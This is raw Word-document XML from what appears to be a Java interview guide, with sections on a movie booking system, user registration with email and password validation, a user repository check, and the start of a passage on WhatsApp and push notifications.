    <w:p w14:paraId="179CFC7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C8E64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B56B9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EC5F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603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8BB8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3910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4C4392D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76582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4FF3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p>
    <w:p w14:paraId="5239D6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D70D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21EC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8103C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7A0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2C5F66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2E3918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53AD4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2C766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3CC845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Show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A29F2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39D79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10974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7FC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4AF32F5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BC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Seats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388ACDC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04BF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009E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C792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7F31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6E2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6EF3F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779277B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8773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D31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01D0D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937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1249E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9803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907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C4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0A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69D77FC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4F0E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DCD67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D1D212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18C86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1431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CA917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09DF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E319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225F064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281C35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72FB4C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3602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uditorium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7F1AAA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D13206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CF73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976B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09D1A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ditorium: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4DBC509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CF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hows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4571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505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DF4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0C2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89BE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75C8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5C1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8F1CB8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35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950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703336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7B308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57764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211B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4E2D4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2B3B6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91E2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3AA9E9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93EF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5D0AC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4572F7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682D6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A2E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52B2E70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56E2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inemaBooking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3917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3496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Movie Shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A85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85C525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18CF23C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D4D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Screens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B90C3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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34172A5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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C055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B004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uditorium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A12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auditori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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855C9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1B9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splay all screens and movie shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC535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creens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620563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BBA9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ook a ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516BAE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2B0F3B4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60F42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seat availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84015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3554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vailabili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BFCA16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D55A8" w14:textId="10B676CB"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A9C0EE" w14:textId="77777777" w:rsidR="00B4136F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B4136F" w:rsidP="00B4136F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B07060" w14:textId="77777777" w:rsidR="00B4136F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B4136F" w:rsidP="00B4136F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467B84C8" w14:textId="1FE85A09" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc197867606"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00595B02" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Movie Booking System related code and data structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w14:paraId="0BA1CC1E" w14:textId="27B25059" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="00BD73E6">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D73E6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Movie booking system related java codes, check availability, book ticket with multiple classes and use of data structures?</w:t>
      </w:r>
      <w:r w:rsidR="00BD73E6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59205E1C" w14:textId="28E86956" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00595B02">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Refer above code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9A1CD" w14:textId="0A654735" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc197867607"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00BE1951" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain User registration functionality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="11211263" w14:textId="7070AEF2" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="0025719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057CF1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain</w:t>
      </w:r>
      <w:r w:rsidR="00257193" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the implementation of the User registration method using java? Explain how will you implement it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB1C6F" w14:textId="47BA73C4"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CE4B95" w:rsidRDefault="009667C9"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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>User Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D0E4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28C4A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70E302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65B674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B95A700"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3451D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375D8"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3A3CE524"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4D2F71B7"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02A58F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A2D8C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62880E"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0A6B69"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C76B6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FC9C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9C80BA"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34A9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7E508533"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12DE4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E6213C"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5D3BD"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1E8C47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EF85A" w14:textId="4A2AE078"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602A1A" w14:textId="2AAC2D86"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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>UserRegistration Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BDE4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ex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A1FA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6C504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50D07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A5E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username (non-empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB518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name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404A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i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3EC28B1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F2C9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3EE6B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email using regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625BAF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Email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838B2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Reg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zA-Z0-9_+&amp;*-]+(?:\\.[a-zA-Z0-9_+&amp;*-]+)*@(?:[a-zA-Z0-9-]+\\.)+[a-zA-Z]{2,7}$"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317EFC3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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> patter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Regex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E8CA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cher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> matc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p>
    <w:p w14:paraId="308748E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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105669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E8FE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24000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ssword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1A8F6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FBF5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013B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674A2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793992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37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pp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16242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1993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D39A32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34477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Digit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA65A4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E30D0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784D5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 if all details are valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CD7F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680F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name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D5F6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name is invalid."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42326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593C16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E6FA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ail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BECD4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ail format is invalid."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD54A8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A98BFB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6D0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ssword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63AEA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ssword must be at least 8 characters long and contain an uppercase letter, a lowercase letter, and a number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33307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4ABEBD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2F87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82958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aving the user (for example, add to a database or list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAFC4B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B19BA4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gistered successfully!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C18E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1C24FB7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1CF2E8" w14:textId="6C3EB955"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E558B4" w14:textId="10C1E173"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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Main Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7807D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29D1AEE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30A28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8B6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E38D1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796B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704D1C7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userRegist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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A712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E3B0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user details from input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F01AC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username: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3EECD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3B121EE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38290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password: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A083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246931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9011A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email: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01A44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06093B8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3E43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user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA99C5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Register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gist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1BDFC9F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53D51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Register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263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successful!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62C75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8613C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failed. Please try again."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B14B2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9BED4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EBAB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lose</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24986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08FA64" w14:textId="24766126"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1BA535D" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95" w:rsidRDefault="009667C9" w:rsidP="009667C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E5588F" w14:textId="4366B7B2" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc197867608"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00F03300" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a method to register and check the available user in repo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
    </w:p>
    <w:p w14:paraId="0EC567F4" w14:textId="41333A4B"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58B58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3391F0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67928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6E0A9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1199BE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23DF2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8703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AE22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65DBBE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14FE123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0E840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EBE0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168B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3EC28B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E32A0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D0532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135F6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6F40CB6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C7794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85147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6F6B2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F9B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user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asswor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7BCBEB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E3FF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51992E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527B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09C9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memory storage for registered users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034779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7DDC0A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5128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a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1576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70E19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user already exists in the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A97A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88D9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ith user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lready exists."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2B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er already exists, registration failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66F0B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2D3CC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815CD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new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D4312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new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386F49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059845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registered successfull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537265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4FC6D9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26E4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6C665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user is available in the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EF0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Availabl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6560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rue if user exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF150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664FC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60FAC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4F47F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7FA0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107E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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE9562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9AEE3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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB15180"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123"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50908B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ne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456"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433F6D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6891BD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users are available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19C2F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john_doe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p>
    <w:p w14:paraId="095A64F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alice_smith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_smith"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF1CC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64A66" w14:textId="03EC3133"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D69C5D" w14:textId="77777777" w:rsidR="00AB1E17" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB1E17" w:rsidP="00AB1E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8A043A" w14:textId="459E324B" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc197867609"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="008A0829" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WhatsApp notification and mobile notification example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w14:paraId="4CD11CBB" w14:textId="7D3DE8A3" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00B94A4A">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751ED2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How can you handle WhatsApp notification and mobile notification after user registration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D480ED9" w14:textId="7AF7790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view of Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEBD43"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07DF9BD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WhatsApp Business API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send WhatsApp messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B5609"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Push Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E553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mobile notifications, you can use services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
